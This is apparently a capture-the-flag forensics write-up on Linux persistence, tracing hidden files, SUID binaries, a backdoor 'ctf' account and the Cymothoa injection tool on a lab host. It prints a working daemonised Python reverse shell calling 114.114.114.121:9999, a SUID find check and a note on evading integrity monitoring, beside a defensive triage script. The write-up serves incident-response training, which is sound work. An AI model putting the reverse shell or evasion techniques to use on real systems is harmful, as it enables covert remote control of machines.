Xuanji (玄机) Chapter 3: Persistence - Linux Persistence - Hiding

0x01

This one mainly tests hunting through file paths; once you know a few of the common detection-evasion tools, they are easy to find.

0x02 action

First, the file paths are the usual two, /tmp and /opt, which we already know. Connect first:

ssh -p 31476 root@env.xj.edisec.net
xjqxwcyc

Search for the paths of hidden files:

find / -type f -name ".*" 2>/dev/null
# too many under /sys, those come with the system by default; filter them out
find / -type f -name ".*" 2>/dev/null | grep -v "/sys/"

root@xuanji:~# find / -type f -name ".*" 2>/dev/null | grep -v "/sys/"
/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile
/etc/mysql/conf.d/.keepme
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/root/.bashrc
/root/.profile
/root/.bash_history
/root/.viminfo
/tmp/.temp/libprocesshider/.gitignore
/.dockerenv

Then follow up inside that /tmp directory:

root@xuanji:/tmp/.temp/libprocesshider# ls
1.py Makefile README.md processhider.c shell.py
root@xuanji:/tmp/.temp/libprocesshider# cat 1.py
#!/usr/bin/python3

import socket,subprocess,os,sys, time

# first fork: the parent exits so the child is no longer tied to the caller
pidrg = os.fork()
if pidrg > 0:
    sys.exit(0)

# new session, root cwd, cleared umask: the classic daemonise sequence
os.chdir("/")
os.setsid()
os.umask(0)
# second fork: the process can never reacquire a controlling terminal
drgpid = os.fork()
if drgpid > 0:
    sys.exit(0)

# reconnect loop: keeps dialling the C2 address every 2 seconds
while 1:
    try:
        sys.stdout.flush()
        sys.stderr.flush()
        fdreg = open("/dev/null", "w")
        sys.stdout = fdreg
        sys.stderr = fdreg
        sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sdregs.connect(("114.114.114.121",9999))
        # stdin/stdout/stderr are redirected to the socket, then an interactive bash is spawned
        os.dup2(sdregs.fileno(),0)
        os.dup2(sdregs.fileno(),1)
        os.dup2(sdregs.fileno(),2)
        p=subprocess.call(["/bin/bash","-i"])
        sdregs.close()
    except Exception:
        pass
    time.sleep(2)

That gives us two flags directly:

flag{md5(/tmp/.temp/libprocesshider/1.py)}
flag{114.114.114.121:9999}

The most common privilege escalation routes at the moment are kernel exploits and SUID binaries; let's look at SUID first:

root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

find is in the list; let's see whether it is usable:

root@xuanji:/tmp/.temp/libprocesshider# find . -exec ls \; -quit
1.py Makefile README.md processhider.c shell.py
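The two listings above (the hidden-file search and the SUID search) are mostly noise that a stock Debian-like host carries, and the job is to spot what does not belong. As an added defender-side example (not code from this writeup or from the tools it names), the following Python triages both listings offline: it filters the hidden-file output against an allowlist of default dotfiles, flags what remains and calls out drop directories such as /tmp and /opt, and diffs the SUID listing against a baseline set. The allowlist, the hot-directory list and the SUID baseline are hypothetical starting points assembled from the listings in this writeup; the sample inputs are those same listings embedded inline.

```python
"""Offline triage of `find` output for hidden files and SUID binaries.

Added example for this writeup; not code from the challenge or from the
tools it names. Allowlist, hot-directory list and SUID baseline are
hypothetical starting points assembled from the listings above.
"""
from fnmatch import fnmatchcase

# Dotfiles and pseudo-filesystems a stock Debian-like host carries.
# fnmatch's '*' also crosses '/', so "/sys/*" covers the whole tree.
BENIGN_HIDDEN = [
    "/sys/*", "/proc/*",
    "/.dockerenv",
    "/etc/.pwd.lock",
    "/etc/cron.*/.placeholder",
    "/etc/init.d/.legacy-bootordering",
    "/etc/skel/.*",
    "/root/.bashrc", "/root/.profile", "/root/.bash_history", "/root/.viminfo",
    "/home/*/.bashrc", "/home/*/.profile",
    "/home/*/.bash_logout", "/home/*/.bash_history",
]

# Directories where a dropped tool is worth a look before anything else.
HOT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/opt/")

# SUID binaries expected on a stock install (hypothetical baseline; build
# the real one from a clean image of the same distribution release).
SUID_BASELINE = {
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping", "/bin/ping6",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/sudo",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
}


def triage_hidden(lines):
    """Return [(path, reason)] for hidden files the allowlist does not explain."""
    findings = []
    for path in (ln.strip() for ln in lines):
        if not path or any(fnmatchcase(path, pat) for pat in BENIGN_HIDDEN):
            continue
        if path.startswith(HOT_DIRS):
            reason = "hidden file in a drop directory"
        else:
            reason = "hidden file outside the baseline"
        findings.append((path, reason))
    return findings


def triage_suid(lines, baseline=SUID_BASELINE):
    """Return the SUID binaries that are not in the baseline, sorted."""
    paths = {ln.strip() for ln in lines if ln.strip()}
    return sorted(paths - baseline)


# Sample input: the two listings from this writeup, embedded so the
# functions run offline.
HIDDEN_LISTING = """\
/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile
/etc/mysql/conf.d/.keepme
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/root/.bashrc
/root/.profile
/root/.bash_history
/root/.viminfo
/tmp/.temp/libprocesshider/.gitignore
/.dockerenv
"""

SUID_LISTING = """\
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
"""

if __name__ == "__main__":
    for path, reason in triage_hidden(HIDDEN_LISTING.splitlines()):
        print("HIDDEN  %-45s %s" % (path, reason))
    for path in triage_suid(SUID_LISTING.splitlines()):
        print("SUID    %-45s not in baseline" % path)
```

On the listings from this box it leaves two hidden files (the MySQL .keepme, which the allowlist simply does not know yet, and the libprocesshider .gitignore under /tmp) and one SUID binary, /usr/bin/find. Feed it real `find` output by piping the command into the script on the host; the allowlist is deliberately a starting point, so expect to extend it from a clean image of the same release.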

So that's what we submit. As for the injection tool, it is no longer to be found under /tmp, so let's check the key files:

root@xuanji:/tmp/.temp/libprocesshider# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
ctf:x:1000:33::/home/ctf:
sslh:x:104:108::/nonexistent:/bin/false

At a glance, this ctf account is the backdoor user; check the files related to it:

root@xuanji:/tmp/.temp/libprocesshider# find / -user ctf 2>/dev/null
/home/ctf
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/home/ctf/flag
/opt/.cymothoa-1-beta
/opt/.cymothoa-1-beta/Makefile
/opt/.cymothoa-1-beta/cymothoa.c
/opt/.cymothoa-1-beta/cymothoa.h
/opt/.cymothoa-1-beta/payloads/fork_shellcode.s
/opt/.cymothoa-1-beta/payloads.h
/opt/.cymothoa-1-beta/personalization.h

Cymothoa is a backdoor tool that injects shellcode into an existing process (a process-injection backdoor). Through this injection it disguises the shellcode as a regular program. The injected backdoor is meant to coexist with the program (process) it was injected into, so as not to arouse the suspicion of administrators and maintainers. Injecting shellcode into another process has a further advantage: even if the target system's security tools monitor the integrity of executables, as long as they do not inspect memory they cannot detect the process hosting the injected backdoor.

root@xuanji:/tmp/.temp/libprocesshider# cd /opt/.cymothoa-1-beta
root@xuanji:/opt/.cymothoa-1-beta# ls
Makefile bgrep.c cymothoa cymothoa.h payloads personalization.h syscalls.txt udp_server.c
bgrep core cymothoa.c hexdump_to_cstring.pl payloads.h syscall_code.pl udp_server

flag{md5(/opt/.cymothoa-1-beta/cymothoa)}

For the interpreter that runs the backdoor file, we just need to locate Python here:

root@xuanji:/opt/.cymothoa-1-beta# whereis python
python: /usr/bin/python3.4 /usr/bin/python3.4m /usr/bin/python /usr/bin/python2.7 /etc/python3.4 /etc/python /etc/python2.7 /usr/lib/python2.7 /usr/lib/python3.4 /usr/local/lib/python3.4 /usr/local/lib/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz

0x03

This one feels like it mostly requires familiarity with certain tools, plus the usual way of thinking about where such files are dropped.